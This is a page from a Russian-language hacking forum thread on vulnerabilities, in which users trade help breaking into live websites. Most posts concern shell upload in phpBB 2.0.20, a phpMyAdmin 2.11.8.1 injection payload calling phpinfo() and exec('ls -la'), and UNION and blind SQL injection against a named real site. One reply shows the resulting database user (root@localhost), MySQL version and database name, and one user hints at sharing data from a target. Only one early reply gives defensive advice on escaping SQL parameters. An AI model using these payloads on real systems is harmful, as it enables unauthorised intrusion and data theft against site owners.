Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1042 of 1207
  1. Kruzak

    Kruzak New Member

    Joined:
    21 Dec 2010
    Messages:
    126
    Likes Received:
    4
    Reputations:
    1
    ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации
     
    #20821 Kruzak, 23 Jul 2012
  2. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Строковые параметры, которые передаешь в SQL запрос из скрипта, обрабатывай функцией mysql_real_escape_string. Те параметры, которые должны быть целочисленными, приводи к типу int. После этого инъекций не будет.
     
    #20822 Chrome~, 23 Jul 2012
  3. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Заранее сорри если миллион раз обсуждалось = \
    Собсно вопрос по заливке шелла в phpbb 2.0.20
    Вообщем гуглил, и находил только один способ... через востановление бд
    FILE_P > Y
    Вообщем создаю файл 1.sql в нем код:
    Востанавливаю БД. Пишет востановилась...
    захожу..
    http://forum/profile.php?mode=editprofile&с=phpinfo();
    phpinfo не выводится = \ что не так ???
    help... или подскажите еще какой способ заливки)
    Не пинать сильно) давно не занимался такими делами)
     
    #20823 GroM88, 24 Jul 2012
    Last edited: 24 Jul 2012
  4. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    ID у юзера, за которого ты залогинен - 2?
     
    #20824 ZARO, 24 Jul 2012
  5. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    да, 2
    еще вопрос, как в phpbb 2.0.20 раскрыть пути?)
    Курил форум) много чего пробовал) не помогло = \
     
    #20825 GroM88, 24 Jul 2012
    Last edited: 24 Jul 2012
  6. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Есть сайт, на нем phpMyAdmin 2.11.8.1
    Уязвимость описана к нему тут _http://forum.antichat.ru/showpost.php?p=871193&postcount=5

    Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит :(
    Что я не так делаю?
    Там кое что стоящее , если что могу поделиться ;) .
    В общем прошу направить меня!!
     
    #20826 WendM, 24 Jul 2012
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Code:
    http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR [COLOR=DarkRed]"PHP"[/COLOR] //&sort_order=desc&token=[valid token]
     
    #20827 wkar, 24 Jul 2012
  8. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Спасиб за ответ, но что то не идет. Пробывал вызвать phpinfo()
    Так
    Code:
    /server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR [COLOR=DarkRed]<?php phpinfo(); ?>[/COLOR] //&amp;sort_order=desc&amp;token=[valid token]
    и так
    Code:
    /server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR [COLOR=DarkRed]phpinfo();[/COLOR] //&amp;sort_order=desc&amp;token=[valid token]
    и так
    Code:
    /server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR [COLOR=DarkRed]phpinfo()[/COLOR] //&amp;sort_order=desc&amp;token=[valid token]
    Но результат нулевой
    Что я не так делаю?
    Token получаю так, ввожу левый пасс и логин, выдает ошибку но в браузерной строке есть токен, его и юзаю
     
    #20828 WendM, 24 Jul 2012
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    попробуй
    Code:
    server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR exec('ls -la'); //&amp;sort_order=desc&amp;token=[valid token]
     
    #20829 wkar, 24 Jul 2012
  10. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Не, ни че не произошло.
    А что должно было получиться?

    Сервер Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at site.ru Port 80
     
    #20830 WendM, 24 Jul 2012
    Last edited: 24 Jul 2012
  11. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    вывод каталога. мб бага закрыта
     
    #20831 wkar, 24 Jul 2012
  12. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Может сам глянешь?
    UPD Отправил ЛС
     
    #20832 WendM, 24 Jul 2012
    Last edited: 24 Jul 2012
  13. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    подскажите что нужно сделать?
    посчитал сколько полей, вот создаю такой запрос (http://site.ru/index.php?tur=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+) и у меня почему то появляется белая страничка
    Подскажите что нужно сделать?
     
    #20833 Hapk, 26 Jul 2012
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    дать линк
     
    #20834 d1v, 26 Jul 2012
  15. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    сейчас попробую через Havij прогнать если нечего не получится тогда линк дам
     
    #20835 Hapk, 26 Jul 2012
  16. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    вот линк http://betz.su/myturnir/turnir.php?tur=-455'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
    #20836 Hapk, 26 Jul 2012
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1,1)='5

    user: root@localhost
    MySQL: 5.1.61-0ubuntu0.10.10.1
    DB: u42397_city
     
    _________________________
    #20837 BigBear, 26 Jul 2012
    1 person likes this.
  18. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    фильтруется select и union
     
    #20838 Melfis, 26 Jul 2012
  19. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    и что теперь нечего нельзя сделать?
     
    #20839 Hapk, 26 Jul 2012
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Чем тебя мой вариант не устраивает ?
     
    _________________________
    #20840 BigBear, 26 Jul 2012
(You must log in or sign up to post here.)
Page 1042 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.